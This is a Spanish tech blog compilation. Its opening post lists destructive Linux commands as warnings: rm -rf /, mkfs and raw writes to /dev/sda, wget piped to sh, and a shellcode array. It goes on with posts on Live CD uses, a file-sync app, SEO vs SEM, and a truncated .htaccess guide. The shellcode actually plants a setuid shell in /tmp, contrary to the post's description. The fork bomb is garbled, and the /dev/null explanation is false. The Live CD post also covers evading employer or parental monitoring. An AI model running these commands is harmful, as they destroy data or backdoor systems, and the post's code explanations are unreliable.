Los 7 comandos de la destrucción de Linux

10:00 0 Comments A+ a-



En linux TU tienes el control total del pc, laptop, table, lo que sea; nada se ejecuta si no es por consetimiento del admiistrador. El peor virus esta sentado delante al computador!


NÚMERO 1:

Código: Bash
  1. rm -rf /

Este comando eliminará a la fuerza y recursivamente (incluyendo subdirectorios), todos los archivos dentro del directorio raiz.

NÚMERO 2:

Código: Bash
  1. char esp[] __attribute__ ((section(".text")) /* e.s.p
  2. release */
  3. = "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
  4. "xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
  5. "xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
  6. "x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
  7. "x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
  8. "xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
  9. "x6ex2fx73x68x00x2dx63x00"
  10. "cp -p /bin/sh /tmp/.beyond; chmod 4755
  11. /tmp/.beyond;";

Esta es la versión hexadecimal de rm -Rf /, con la cual podria engañarse incluso a usuarios linux mas experimentados.

NÚMERO 3:

Código: Bash
  1. # mkfs.ext3 /dev/sda

Reformateala partición/disco, liquidando todos los archivos del dispositivo mencionado despues del comando mkfs.

NÚMERO 4:

Código: Bash
  1. ){:&};:

La ya conocida por muchos Bomba fork (http://www.kriptopolis.org/bombas-y-bombos). Este comando hará que tu sistema ejecute un elevado número de procesos, hasta que el mismo se “cuelgue”. A menudo esto puede acarrear perdida de datos.

NÚMERO 5:

Código: Bash
  1. [cualquier_comando] > /dev/sda

Con este comando, se envian bloques de datos al dispositivo indicado, lo cual a menudo puede colapsar el sistema de archivos, dando como resultado una perdida total de datos.

NÚMERO 6:

Código: Bash
  1. wget http://[fuente_de_origen_inseguro] -O- | sh

Estamos descargando datos, posiblemente un script, de alguna fuente no muy confiable, e inmediatamente despues, estamos ordenando que se ejecute el archivo descargado. NUNCA HAGAS ESTO.

NÚMERO 7:

Código: Bash
  1. mv /home/tudirectoriodeusuario/* /dev/null

Este comando mueve todos los archivos dentro de tu directorio home, a un lugar que no existe, razón por la cual, nunca podras ver tus archivos de nuevo.

Live CD de linux, que es y para que sirven

10:00 0 Comments A+ a-


 En este tema se indican algunas cosas para las que sirve usar un livecd de una distro de Linux ( en la mayoría de los casos es suficiente con un live cd de Ubuntu o derivadas, en otros casos se necesita un live cd de una distro especial, que se indica ); unos usos son muy conocidos, otros no tanto; hay usos que son completamente legales, otros no tanto, o son completamente ilegales ( en estos casos se advierte de ello…si se usan es vuestra responsabilidad ).

Para empezar que es un live CD?

Una distribución live o Live CD o Live DVD, más genéricamente Live Distro, traducido en ocasiones como CD vivo o CD autónomo, es un sistema operativo almacenado en un medio extraíble, tradicionalmente un CD o un DVD (de ahí sus nombres), que puede ejecutarse directamente en una computadora.
Normalmente, un Live CD viene acompañado de un conjunto de aplicaciones. Algunos Live CD incluyen una herramienta que permite instalarlos en el disco duro. Otra característica es que por lo general no se efectúan cambios en el ordenador utilizado, aunque algunos pueden almacenar preferencias si así se desea.

Para usar un Live CD es necesario obtener uno (muchos de ellos distribuyen libremente una imagen ISO que puede bajarse de Internet y grabarse en disco) y configurar la computadora para que arranque desde la unidad lectora, reiniciando luego la computadora con el disco en la lectora, con lo que el Live CD se iniciará automáticamente.

Características

La mayoría usa un sistema operativo basado en el núcleo Linux, pero también se usan otros sistemas como ReactOS, BeOS, FreeBSD, Minix, Solaris, OS/2 o incluso Microsoft Windows (sin embargo, distribuir un Live CD de éste último es ilegal).

Uno de los mayores inconvenientes de este sistema es el requerimiento de una gran cantidad de memoria RAM (256 MB son más que suficientes y hay distribuciones que funcionan perfectamente en 128 MB), una parte para su uso habitual y otra para funcionar como el disco virtual del sistema. En el arranque, se le pueden dar distintos parámetros para adaptar el sistema al computador, como la resolución de pantalla o para activar o desactivar la búsqueda automática de determinado hardware.
Un Live CD no requiere instalación, por lo que no hay que tocar el disco duro, ni seguir procedimientos complicados. Además, los datos, particiones o sistemas operativos del disco duro no se pierden. Aun así, algunos Live CD poseen un instalador para poder ser instaladas, pudiendo conocer el rendimiento real de la distro, pues la velocidad de transferencia de las unidades lectoras (CD/DVD) es muy inferior a la de los discos duros.

Usos y aplicaciones

1- Clonar el disco duro a una imagen: Si se quiere hacer una copia de seguridad del disco duro entero, incluyendo el sistema operativo, es posible hacerlo con el live cd de Clonezilla (http://www.clonezilla.org/downloads.php ) , es una herramienta hecha específicamente para la clonación de unidades de disco duro, puede crear una imagen de cualquier disco duro. Puede crear esta imagen en una variedad de diferentes lugares: en un disco local o de una variedad de lugares de una red. También se puede usar Clonezilla para restaurar el disco duro desde una imagen.
También podemos hacerlo con la herramienta Partimage , bien desde un livecd de instalación de linux añadiendo dicha herramienta desde synaptic, o desde un livecd que ya la lleve

2- Clonar el disco duro a un disco: Si se ha conseguido una nueva unidad de disco duro más grande que la que teníamos, se podría pensar en la sustitución de el actual disco duro primero con esta nueva unidad; esto puede ser complicado…pero no con el live cd Clonezilla. Este live cd también puede copiar todo el disco duro primero a una unidad diferente. Sólo se tiene que seleccionar la opción “dispositivo-dispositivo” ( “device-device” ) para empezar a hacerlo. Se necesitarán dos discos duros conectados a su pc, ( por supuesto, un dispostivo usb puede hacer esto muy simple pero la instalación de dos unidades de forma interna también funciona ).

3- Usar con seguridad un pc infectado: Si se necesita trabajar durante algún tiempo en un equipo que se sabe que está infectado, y no se quiere propagar el virus a un pendrive, disco duro externo, o cualquier otro equipo en la red, etc, un live cd es la herramienta para este trabajo. Los virus no se ejecutarán en el entorno del live cd por lo que se puede hacer un uso temporal del ordenador sin temor a la infección; y lo mejor de todo es que se puede acceder a los archivos del pc infectado.

4- Scanear con antivirus: Se puede escanear un ordenador con un live cd si un virus ha infectado su equipo de tal forma que éste no puede arrancar. Se puede arrancar desde el live cd , actualizar las definiciones de virus y ejecutar un escaneo de todo el disco duro del pc. Se pueden usar para ello un live cd especializado ( por ejemplo, Bitdefender, Avira, AVG, Kaspersky ), o instalar algún programa antivirus en un live cd de tu distro habitual: para esto yo uso Antivirus-Avast

5- Recuperar datos: Desde un livecd puede acceder a los datos almacenados en el disco duro del pc, incluso si el principal sistema operativo esta estropeado, para ello se arranca el pc desde un livecd y se abre el explorador de archivos y se verán las unidades de disco del ordenador en la lista. Simplemente hay que hacer clic en ellas para ver sus archivos. La mayoría de las veces esto nos dará todo el acceso que se necesita. Desde ahí se puede tomar/copiar los datos que desee y hacer una copia de seguridad. La mejor manera de hacer esto es con un disco duro externo o una unidad flash, pero también se puede acceder a las unidades de red.

6- Restaurar datos: Se puede hacer más que leer y recuperar los datos, también se puede escribir en las unidades. Si se tiene información que desea restaurar en su disco, un live cd veces puede ser una forma más rápida de copiar grandes volúmenes de información (sobre todo si su principal sistema operativo es Windows XP.) Sólo hay que abrir el explorador de archivos y abrir las unidades desde la que desea mover la información y hacia donde se quiere restaurar, y continuación, copiar los datos.
Hay que en cuenta que no todos los live cd admiten la escritura en discos ntfs , el tipo por defecto de las unidades utilizado por Windows. Un live cd de Ubuntu/Mint si que lo hace, al igual que otros live cd, en todo caso eso hay averiguarlo antes de intentar utilizarlo para escribir en unidades ntfs de Windows.

7- Ver datos en un mapa: A veces puede ser difícil saber que información necesita para una copia de seguridad, o incluso donde esta la mayor parte de los datos. Afortunadamente la mayoría de los live cd incluyen algún tipo de Analizador de uso de disco, que muestra un mapa del contenido en el disco.
Se tendrá que realizar un análisis, pero una vez hecho se verán todos los archivos.

8- Buscar archivos/carpetas : Todos los live cd vienen con algún tipo de función de búsqueda. La forma mas sencilla es montar el disco duro, y después comprobar con el explorador de archivos, en la barra de búsqueda y analizar los archivos en una unidad determinada: es sencilla si sabes el nombre del archivo que se está tratando de recuperarse, pero no donde se encuentra. Incluso puede ser muy útil si sólo se conoce el tipo de archivo que está tratando de recuperar, en este caso la búsqueda se hará por la extensión del archivo ( .txt, doc, png , etc).

9- Buscar archivos/carpetas ocultos: Algunas carpetas del sistema operativo están ocultas. Se pueden ver estas carpetas en un live cd de Linux con el explorador de archivos: sólo tiene que pulsar “Ctrl + h”. Esto va a mostrar todas las carpetas ocultas, que le da fácil acceso a ellas.


10- Borrar archivos en exceso y/o innecesarios: Llenar el disco duro con un exceso de datos/archivos ( fotos, música, vídeo, documentos, etc ) puede hacer que Windows u otros sistemas operativos vallan muy lento. Se pueden eliminar los archivos no necesarios desde un live cd para que el sistema funcione a pleno rendimiento. Sólo se tiene que utilizar el explorador de archivos para borrar todos los archivos innecesarios ( hay que vaciar la papelera de reciclaje o esto no tendrá ningún efecto ), pero teniendo mucho cuidado de no borrar archivos del sistema, sino solo datos del usuario.
También en linux si llegamos a ocupar todo el espacio de la partición /home ( o de la partición / si /home es solo una carpeta dependiente de / ) puede hacer que no nos permita entrar en la sesión de usuario, y habría que borrar archivos innecesarios desde un livecd.

11- Editar/Trabajar con archivos: Desde un live cd se puede trabajar con procesadores de texto sencillos como gedit o abrir archivos de texto, hojas de cálculo, etc mas complejos con LibreOffice. Esto nos puede servir tanto para seguir trabajando con un archivo aunque el sistema se haya estropeado, como para editar algún archivo del sistema y recuperarlo ( por ejemplo editar algún/os archivo/s de configuración del grub ).
También podemos seguir trabajando con los archivos multimedia que tengamos almacenados en el disco duro, ejecutándolos con los programas multimedia que vienen por defecto en el livecd o instalando temporalmente en el livecd algún programa desde synaptic.

12- Recuperación de un disco ntfs corrupto: Si se tiene una partición ntfs que no arranca, Windows no se inicia, se puede iniciar el pc desde un live cd ya que habitualmente desde él se puede acceder a estas particiones. Si es así y puede entrar en dicha partición es posible que se pueda recuperar/editar un par de archivos vitales de Windows y poder volver a iniciarlo.

13-Obligar a Windows a escanear particiones: Si lo anterior no funciona, quizás la partición ntfs este dañada, aveces un disco solo necesita ser checkeado para arrancar Windows y recuperar datos. Se puede obligar a windows a hacer este chequeo desde Linux, lo cual aveces puede ser suficiente para hacer que Windows funcione de nuevo.
Para ello hay que, desde el en entorno del live cd, instalar el paquete ntfsprogs. Una vez instalado se puede usar el comando ntfsfix para programar la reparación: hay que saber como se llama la partición windows tal como aparecen en /dev ( por ejemplo /dev/sda1 ) para usar este comando: ntfsfix /dev/sda1. Tras ello Windows comprobará la unidad la próxima vez que arranque, a menos que el problema este relacionado con el hardware.

14- Sobrepasar permisos de Windows: Si se desea recuperar los archivos que, por cualquier razón, no son accesibles desde dentro de Windows, tal vez sea porque se guardan en una cuenta de usuario protegida, y ha perdido de la contraseña. Si sólo se desea acceder a los archivos también es posible: desde el live cd se abre un administrador de archivos con permisos de root: se presiona “Ctl” seguido de “F2″, a continuación, se escribe gksu nautilus , con ello se abre un explorador de archivos que puede abrir cualquier carpeta, sin tener en cuenta los permisos que Windows le hubiera otorgado.

15- Hackear contraseñas de Windows Xp/Vista: para ello se necesita un live cd especial ( uno para Xp y otro para Vista ), ambos se pueden bajar desde: http://ophcrack.sourceforge.net/ . Se advierte que hacer esto puede ser ilegal, y obviamente no voy a explicar como hacerlo.

16-Usar un pc sin contraseña: se puede utilizar cualquier ordenador desde un live cd tanto si se sabe la contraseña de acceso como si no. Dado que el entorno del live cd está completamente separado del entorno principal de la computadora, no es necesario conocer la contraseña; no se tendrá acceso a cualquier software instalado en el equipo, pero es una manera sencilla de conectarse a la web y de acceder a archivos.

17- Hackear contraseñas de wifi: Se advierte que entrar en la red de otra persona es ilegal. BackTrack es una distribución Linux orientada a la seguridad, capaz de muchas cosas, entre ellas esto. Obviamente no voy a explicar como hacerlo.

18- Bypass un master boot record (mbr ) corrupto: Con el live cd de Ultimate Boot Cd.com se puede iniciar Windows incluso cuando el mbr falla o está corrupto.; permite iniciar desde la partición que se elija, con lo que podremos iniciar Windows, y desde él arreglar el mbr.

19-Reparar un master boot record corrupto: Por supuesto, También se puede reparar el mbr desde el Ultimate Boot CD. Bajo la “partición” del menú de este CD encontrará una opción llamada “fixmbr”. Esta herramienta es el pasaporte para que todo vuelva a la normalidad en el ordenador.


20- Navegar por internet de forma segura: La mayoría de navegadores vienen con un modo de privacidad. Este modo normalmente no deja rastro de su actividad, ya sea en las cookies o el historial del navegador. Para la mayoría de las personas, esto proporciona suficiente seguridad/privacidad. Pero si usted es realmente paranoico con la navegación segura, se recomienda usar un live cd para una navegación verdaderamente segura. Ninguna información de su sesión de navegación se escribirá en su disco duro, dejando a su sesión completamente segura. Esto puede ser útil por ejemplo para consultar datos de nuestro banco on line.

21- Usar de forma segura un pc público: Consecuencia de lo anterior, si no te fías de que un pc de un hotel, cibercafé, etc pueda estar infectado y/o quieres mantener tu privacidad al máximo, usar un live cd para ello es una buena idea.

22- Evitar el “espionaje” por padres o empleadores: ¿Alguien, padres, jefes o empleadores, registran de todo lo que haces en tu ordenador? . Si su sistema de registro se basa en software, y se ejecuta en su computadora, no se preocupe: se puede prescindir de ella. Sólo tiene que utilizar su ordenador desde un livecd y usted estará completamente a salvo. Pero tenga en cuenta que esto no servirá de nada si el sistema de monitoreo funciona en el nivel de la red.

23- Sobrepasando filtros de conexión: Esta estrategia también puede aplicarse a los sistemas de filtrado, si estos sistemas son locales y basados en software, por lo que si desea una solución para conectarse a Facebook, etc, en el trabajo o en casa, sobrepasando los filtros que se hayan establecido en el sistema, un live cd puede dar acceso a todos los sitios de Internet con facilidad.
Tenga en cuenta que esto no servirá de nada si el filtro funciona en el nivel de red, como lo hacen muchos filtros hoy en día.

24-Jugar, o usar software inadecuado en el trabajo: De modo similar usar un live cd es una buena forma de jugar, bien con los juegos que vienen de serie o instalando otros, o usar otro tipo de programas que en teoría no puedes usar en el trabajo. Estos ultimos usos de un live cd pueden ser ilegales, y pueden costar un disgusto grave si te pillan.

25-Recuperar el Grub: se puede hacer bien desde el livecd de instalación del sistema o bien desde un livecd específicamente hecho para este asunto: SuperGrubDisk: se puede encontrar en esta dirección http://www.supergrubdisk.org ( su versión más reciente que da soporte a Grub2, es la 1.98 http://developer.berlios.de/project/showfiles.php?group_id=10921 ). En este tema se explica como recuperar el grub

26- Comprobar las particiones del sistema linux instalado en el disco duro: Para ello iniciamos el pc desde el livecd de instalación y ejecutamos el comando fsck: fsck ( file system consistency check ) Este comando se usa ante alguna inconsistencia del sistema de archivos para corregir los posibles errores en el sistema. Fsck se ejecuta automáticamente al inicio del sistema ante alguna anomalía, pero también puede ser utilizada manualmente por el administrador del sistema para forzar un chequeo. Para verificar un sistema de archivos es muy aconsejable hacerlo mientras éste está desmontado, por ello es por lo que para ejecutar dicho comando sobre la partición / necesariamente tiene que hacerse desde un livecd.

27- Probar Linux: La mayoría de distros Linux tienen la opción de usar un livecd para probarla sin necesidad de instalarla previamente en el disco duro, es una manera muy sencilla de probar distros antes de decidirse a instalar alguna de ellas en el disco duro. Hay que tener en cuenta de todas formas que no funcionaran con la misma rapidez, en un entorno de live cd ( se ejecuta mas lentamente ) que una vez instaladas.

28- Hacer que un invitado pueda usar un sistema operativo: Si se quiere que los amigos puedan usar el pc, pero no se quiere que puedan dañar su sistema operativo principal, es una solución el uso de un live cd. Es un entorno seguro, y más que suficiente para conectarse a la web.


29- Probar software: Si quieres probar algunos programas, pero no desea instalarlos en el disco duro, lo puedes hacer desde un live cd, bien a partir del Centro de Software bien a partir de Synaptic. En ambos casos antes debes establecer una conexión con internet.

30- Manejar particiones: desde un live cd, usando la herramienta gparted se pueden editar ( cambiar el tamaño ), añadir o borrar particiones. Esto es útil para crear las particiones adecuadas antes de instalar un sistema operativo, o modificar las particiones de uno ya instalado ( no se debe usar gparted para ello desde el propio sistema ) o para borrar la partición en donde esta un sistema que queremos eliminar.

31- Comprobar la memoria: si el equipo se bloquea constantemente, puede ser una buena idea para comprobar si la memoria Ram está funcionando. Casi todos los live cd incluyen un “memtest” durante el arranque. Seleccione esta opción y se ejecutara un test, el cual te indicara bloques malos de memoria, si defectuosos es hora de reemplazar la memoria Ram

32- Comprobar el disco duro: Por problemas de disco duro también se puede venir abajo un sistema, por lo que es una buena idea para comprobar su la salud de vez en cuando, especialmente si usted está teniendo problemas con el ordenador. Ubuntu, y muchos otros live cd vienen con una Utilidad de Disco ( comando: palimpsest ) para comprobar toda la información que se puede desear acerca de sudispositivos de almacenamiento, y si es el momento para un nuevo unidad en la que verá una recomendación en ese sentido.

33- Comprobar otro hardware: El live cd Ultimate Boot CD, esta hecho para que pueda probar el hardware, contiene cientos de pruebas diferentes para una amplia variedad de hardware diferentes. Si se quiere saber si la tarjeta gráfica, cpu o cualquier otra cosa está empezando a fallar, este es el live cd que se debe usar.

34- Comprobar si un problema es hardware o software: Si se tiene un problema informático, pero no se sabe si el problema es de hardware o software, se puede usar un live cd para el diagnóstico. Basta con arrancar el ordenador desde un live cd, y ver si se bloquea el sistema/programa con el que se ha sucedido el problema: si lo hace, el problema es de hardware: no hay virus, la corrupción del registro u otros problemas de software que pueden afectar al entorno del live cd.
A la inversa, si el problema no se produce, probablemente hay un problema de software en el sistema instalado en el disco duro.
Esta no es una prueba infalible, pero es una buena forma de averiguar hacia donde se debe tratar de encontrar la solución al problema.

35- Instalar una distro Linux: Una vez se ha comprobado que la distro que tenemos en el live cd nos gusta y cumple los requerimientos de nuestro pc y nuestras necesidades de uso, podemos desde el mismo live cd proceder a la instalación de la distro en nuestro disco duro. La creación de las particiones necesarias para la instalación se puede hacer bien usando la herramienta gparted previamente al proceso de instalación, o bien en uno de los pasos del proceso de instalación.

36- conectar a un servidor en red: desde un livecd nos podemos conectar en red a otro pc con linux a través del protocolo sftp, instalando los paqutes ssfs y openssh-cliente a través de la terminal con la orden: sudo apt-get install sshfs openssh-client

37- crear un servidor ssh temporal: de forma similar podemos crear un servidor ssh temporal desde un livecd, instalando el paquete openssh-server a través de la terminal con la orden: sudo apt-get install openssh-server . Para ver con mas detalle como crear una red local entre dos pcs con linux y realizar los usos 36 y 37: Crear una red local entre pcs con el protocolo sftp

38- crear un servidor vnc temporal: desde un livecd podemos controlar de forma remota a uno o varios pcs en una red, para ello deberemos instalar un programa que nos permita el control remoto. Hay varios programas que realizan esta función. Por ejemplo el programa Vinagre. En el pc Remoto hay que dar permiso para que desde el pc Controlador, ( el pc que usamos desde el livecd ) se pueda acceder a éste. Para ello comprobaremos que tenemos instalado el paquete Vino, o lo instalaremos desde Synaptic, y debemos configurarlo para que pueda ser controlado remotamente.

Droid Sync Manager: Transfiere archivos de tu PC a tu Android

11:00 0 Comments A+ a-


Para solucionarlo en Play podemos encontrar muchas Apps que permiten pasar archivos a través de WiFi, como AirDroid, que se actualizó hace poco con muchas novedades. Sin embargo, desde XDA nos llega una aplicación muy interesante para visualizar desde nuestro Android, todos los archivos y carpetas alojados en el PC, pudiendo descargarlos al dispositivo en un sólo toque.
La transferencia de archivos entre el ordenador personal y el smartphone o tablet es siempre algo necesario, ya sea para pasar fotos, vídeos, documentos o archivos de mayor tamaño. La opción más tradicional es el cable USB, pero siempre es un engorro depender de los cables.

La herramienta se llama Droid Sync Manager y, aunque todavía está en fase alpha, promete mucho. Esta desarrollada por OmarBizreh, usuario del conocido foro XDA, y por ahora está limitada a funcionar sólo con Windows, ya que hay que instalar un cliente de escritorio para que funcione.

Como hemos dicho, una vez se tiene listo el programa en Windows, y la App en Android, podremos ver todas las carpetas y documentos del PC en el móvil, pudiendo transferirlas fácilmente, directamente desde el teléfono. Aunque está en desarrollo, se espera que en próximas versiones se incluya la posibilidad de hacerlo también el sentido contrario.

 

Al estar en fase Alpha, no se puede encontrar en Google Play directamente, sino que primero hay que unirse a la comunidad de Google+ para acceder a Droid Sync Manager. Si quieres más información del funcionamiento y cómo configurar el cliente de escritorio para Windows así como otros detalles, pásate por el hilo oficial en XDA-Developers.

SEO vs SEM

12:30 0 Comments A+ a-



Al desarrollar un nuevo sitio Web, es una realidad que no siempre se invierte en hacer una campaña de posicionamiento en buscadores completa, y abarcar tanto SEO como SEM.
ya que podemos obtener muy buenos beneficios de ambas.

Todo en Internet se divide en:

- Contenidos
- Producto
- Servicio

¿Qué tienen en común un contenido un producto o un servicio?
Todas llegamos a ellos, mediante una búsqueda en internet.
Y todos creemos y confiamos en un sitio Web por ser: 

- El más popular
- Los que tienen mejor contenido
- Los que tienen mejor accesibilidad

Una campaña de SEM Search Engine Marketing se puede definir de muchas maneras como ser:

- Marketing en buscadores
- Comprar tráfico
- Hacer publicidad en un buscador
Todos estas “definiciones” son correctos ya que hace todo eso. El objetivo de una campaña de SEM, es sin duda incrementar el tráfico de nuestro sitio Web, pero es un poco más complejo que eso.
Ya que este “trafico” debe estar orientado a un usuario en particular, el cual busca nuestro contenido o producto o servicio.

SEO
- Resultados a medio-largo plazo
- Mayor esfuerzo
- Más económico
- Selectivo (cantidad de palabras clave)
- Requiere conocimiento técnico
- Redacción orientada a buscadore

SEM
- Resultados a corto plazo
- Menor esfuerzo
- Más caro
- Masivo (palabras clave)
- No requiere conocimiento técnico (Aparentemente)
- Redacción orientada a usuarios

Puntualmente el tema de la Redacción orientada a Buscadores o a usuarios, siempre que tengamos en cuenta primero a los usuarios, mejor será nuestros contenidos en cualquier caso, ya que los busca odres cada día se hacen más “inteligentes” y repetir palabras, no es una buena estrategia, ya que los usuarios no entenderán el texto, y se iran de nuestro sitio y peor aún no volverá, y los Buscadores se darán cuenta de estos engaños, y nos penalizaran
Una campaña de Banners en sitios Web, es un buen complemento a una campaña en buscadores, pero el ROI y la fidelización no serán tan eficientes como una campaña en Google Adwords o Yahoo! Search Marketing.

Una campaña de SEO o de Optimizado para Motores de Búsqueda abarca ítems como:

- Mejorar la accesibilidad a nuestro sitio Web, mejorándolo para los usuarios y para los motores de búsqueda
- Desarrollar contenidos de calidad
- Obtener la popularidad de nuestro sitio Web

De estos tres ítems fundamentales de un trabajo de SEO, nosotros solo tenemos que focalizarnos en Mejorar la accesibilidad a nuestro sitio Web y Desarrollar contenidos de calidad, la popularidad de nuestro sitio Web será un fruto de hacer bien los dos puntos anteriores, y desde luego se pueden implementar técnicas para incentivar la popularidad de nuestro sitio Web.

Al hacer SEO y SEM:

Con una Campaña de SEO bien implementada obtendremos grandes ventajas sombre nuestro competidores al invertir en Google Adwords, a tal punto que el costo por clic puede ser más bajo que el de nuestro competidor, el cual solo invierte en Google Adwords. Por qué sucede esto, es muy simple:
Google necesita hacer rentable el espacio del resultado de búsqueda.
Al mostrarnos los sitios Web que son los resultados más adecuados para nuestra búsqueda, paralelamente nos muestras anuncios patrocinados.
Los anuncios en Google, se venden en modo subasta, el que paga más por una determinada palabra clave, esta 1º. Pero no es tan simple, ya que nuestro anuncio puede no ser relevante al contenido del sitio Web, por diferentes razones: Google Adwords no solo evalúa que el anuncio se publique en las palabras claves que hemos “comprado” si no que además, analiza el contenido del sitio Web al cual apunta nuestro anuncio. Para asegurarse, que nuestro anuncio en Google Adwords se refiere a “juegos de Ben10”, y compramos esta palabra clave, el robot de Google entrara a nuestro sitio Web para evaluar la relevancia en nuestro sitio Web con la palabra clave “juegos de Ben10”.
Por ello es fundamental que en nuestro sitio Web se haya contemplado una con campaña de SEO, desarrollar contenidos de calidad y optimizando la accesibilidad a nuestro sitio Web, no solo para los usuarios sino también para los buscadores o el robot de Google.

Supongamos que nuestro sitio Web está desarrollado en FLASH. El robot de Google no podrá evaluar si el contenido del sitio Web vende “juegos de Ben10” (volviendo al ejemplo). Por ende Google comenzara a dudar si es verdad. Supongamos además, que nuestro anuncio por X motivo no tienen muchos clic, ergo Google no gana $, ergo Google nos “dice” que el valor de la palabra clave “juegos de Ben10” es más elevado que lo que le “dice” a nuestra competencia.

Google necesita monetizar el espacio físico del resultado de búsqueda:

Supongamos: En un mes Google tienen ingresos de $100 con el anuncio de nuestra competencia, que tienen 100 clics por mes. Pero nuestro anuncio solo genera 50 clic por mes, ganando solo $50. Esto no es rentable para Google, pero nunca va a dejar de publicar nuestro anuncio, nos asistirá con algunos concejos, para optimizar nuestro anuncio en Google AdWords, paralelamente, nos dirán que el costo por clic es de $ 2.

En resumen, una campaña de SEM en un sitio Web, con y sin SEO

Sitio Web desarrollado en FLASH o HTML sin SEO
- Google AdWords nos dice: “juegos de Ben10” = $2
- Invertimos $100, tenemos 50 clic, 50 ventas.
- Solo obtendremos visitas desde Google AdWords

Sitio Web HTML o PHP, etc, con SEO
- Google AdWords nos dice: “juegos de Ben10” = $1
- Invertimos $100, tenemos 100 clic, 100 ventas.
- Además de las visitas desde Google AdWords,
- Tendremos visitas desde Google medianera SEO y de otros sitios Web
- Google nos puede “premiar” publicando nuestro anuncio en el área (1) SEM
Paralelamente al trabajo de SEO, siempre proponemos el “Pan B”, que se realiza en paralelo al trabajo de posicionamiento en buscadores, que son las campañas de SEM (Search Engine marketing o campaña de marketing) que consiste en desarrollar campañas de publicidad Online, comprando clic en sitios comoGoogle Adwords o Yahoo! Search Marketing.
Es importante entender que:
- SEO resultados a media y largo plazo
- SEO dejamos de “invertir” y seguimos apareciendo en Google
(dependerá de las acciones de su competencia)
- SEM resultados a corto plazo
- SEM dejamos de “invertir” y dejamos de figurar en los resultados de búsqueda;

Al desarrollar campañas de SEM en paralelo a las campañas de SEO:
- Se optimiza el costo por clic
- Se mejora la relevancia de los resultados de búsqueda
- Google nos premia con anuncios destacados, al mismo costo

¿Como aparezco en Google?
Nuestras campaña de SEM por defecto aparecerá en el área (2) SEM, al comprar ciertas palabras claves

¿Como figurar en el área (1) SEM?
Al realizar una campaña de SEM exitosa Google nos premia, publicando nuestros anuncios en esta área.

¿Cómo logro una campaña exitosa en Google Adwords?
Al desarrollar una campa de SEM conjuntamente con una de SEO, tenemos grandes posibilidades de figurar en esta área, ya que la relevancia de nuestro anuncio y de nuestro sitio Web optimizado mediante SEO será mejor.
Cualquiera puede desarrollar una campaña de SEM, pero no cualquiera puede optimizar la inversión de una campaña de SEM. No es verdad que no se requieren conocimientos técnicos de cómo desarrollar una campaña de SEM.

A una campaña de SEM mal implementada, Google Adwords le cobrara mas caro el clic por palabra que a una campaña bien desarrollada.

Figurar en el área SEO, de resultados de búsqueda orgánico es “gratis”, el costo de inversión es: tiempo y perseverancia.
Para posicionar aun mejor tu sitio web, te recomendamos que nos contactes para ofrecerte mayor información al respecto

Códigos .htaccess que siempre deberias saber

8:30 0 Comments A+ a-


 Aunque por lo general asociamos .htaccess directamente con seguridad, es posible realizar otras cosas interesantes con estos ficheros. Crear uno de estos archivos es muy simple, podemos usar cualquier editor de texto y al salvarlo estar seguros de que lleva por nombre, exactamente, ".htaccess" -claro está, sin las comillas-.

Antes de entrar en materia debemos asegurarnos de respaldar cualquier archivo .htaccess presente en el directorio que vamos utilizar para copiar el nuestro, así podremos devolver todo a su estado original en caso de que algo no funcione de la manera que queremos.

Con esto en mente, pasemos a revisar algunos ejemplos prácticos:

Crear páginas de error personalizadas

Ya todos sabemos que los servidores devuelven al cliente diferentes códigos de error cuando algo no anda bien, por ejemplo: el famoso 404 para las páginas no encontradas, 403 para acceso denegado o el temido error 500 que indica un problema interno con el servidor. Con .htaccess es posible redirigir a los visitantes hacia una página mucho más amigable cuando uno de estos errores se presenta. Todo lo que debemos hacer es agregar el siguiente código a nuestro "fichero mágico".

Código: Text
  1. ErrorDocument 400 /error/400.html
  2. ErrorDocument 401 /error/401.html
  3. ErrorDocument 403 /error/403.html
  4. ErrorDocument 404 /error/404.html
  5. ErrorDocument 500 /error/500.html

Forzar la descarga de tipos de fichero específicos

Si en nuestro sitio web ofrecemos acceso a diferentes tipos de archivos como .mp3, .pdf, .xls, etc, podemos establecer una configuración para que estos se descarguen de manera forzada en lugar de permitir al navegador elegir que hacer con ellos. El código para realizar esto es el siguiente y solo debemos modificar la extensión del tipo de archivo que deseamos forzar.

Código: Text
  1. <Files *.mp3>
  2.  ForceType application/octet-stream
  3.  Header set Content-Disposition attachment
  4. </Files>
  5. <Files *.xls>
  6.  ForceType application/octet-stream
  7.  Header set Content-Disposition attachment
  8. </Files>

Prevenir el Hotlinking

En el artículo anterior aprendimos lo que significa Hotlinking (o Hotlink) y que es posible prevenirlo gracias a .htaccess. Con el siguiente código evitaremos que otros consuman nuestro valioso ancho de banda.

Código: Text
  1. RewriteEngine On
  2. #Cambiamos ?mysite.com/ con la url de nuestro sitio
  3. RewriteCond %{HTTP_REFERER} !^http://(.+.)?mysite.com/ [NC]
  4. RewriteCond %{HTTP_REFERER} !^$
  5. #Cambiamos /images/nohotlink.jpg con una imagen que indique que no toleramos los hotlinks
  6. RewriteRule .*.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

Utilizar el cache para aumentar la velocidad de nuestro sitio

Probablemente este sea uno de los códigos más valiosos de esta lista, ya que nos permitirá acelerar de manera considerable la velocidad de carga de nuestro sitio utilizando el cache. Cada bloque de código a continuación sirve para definir los tipos de archivo que se almacenarán en cache y la cantidad de tiempo -en segundos- que permanecerán allí.

Código: Text
  1. # 1 Año
  2. <FilesMatch ".(ico|pdf|flv)$">
  3. Header set Cache-Control "max-age=29030400, public"
  4. </FilesMatch>
  5. # 1 Semana
  6. <FilesMatch ".(jpg|jpeg|png|gif|swf)$">
  7. Header set Cache-Control "max-age=604800, public"
  8. </FilesMatch>
  9. # 2 Días
  10. <FilesMatch ".(xml|txt|css|js)$">
  11. Header set Cache-Control "max-age=172800, proxy-revalidate"
  12. </FilesMatch>
  13. # 1 Minuto
  14. <FilesMatch ".(html|htm|php)$">
  15. Header set Cache-Control "max-age=60, private, proxy-revalidate"
  16. </FilesMatch>

Crear una lista negra de direcciones IP

Como bien explicaba nuestro compañero JJ, con .htaccess podemos combatir el SPAM de manera agresiva. Una forma de hacerlo es bloqueando las direcciones IP identificadas como fuente de comentarios basura. Copia y pega el siguiente código en el fichero .htaccess de tu servidor y reemplaza las direcciones IP por las que deseas bloquear.

Código: Text
  1. <Limit GET POST PUT>
  2. order allow, deny
